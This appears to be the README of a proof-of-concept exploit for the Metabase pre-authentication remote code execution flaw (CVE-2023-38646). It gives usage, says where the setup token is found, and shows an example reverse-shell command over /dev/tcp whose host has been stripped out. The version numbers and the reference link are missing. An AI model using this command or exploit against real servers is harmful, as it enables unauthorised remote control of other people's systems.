# Metabase Pre-Auth RCE (CVE-2023-38646) POC
This is a python script which exploits the remote code execution vulnerability of Metabase's login software. It allows us to execute arbitrary commands on the server before authentication.

Vulnerable versions are Metabase open source before and Metabase Enterprise before

## Usage
python3 -u URL -t TOKEN -c COMMAND
## Arguments
-h, --help            show this help message and exit
-u URL, --url URL     Target URL
-t TOKEN, --token TOKEN
                      Setup-Token found in /api/session/properties
-c COMMAND, --command COMMAND
                      Command to be executed in the target host

## Example

Command used: `bash -i >& /dev/tcp/ 0>&1`

## References
[Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)](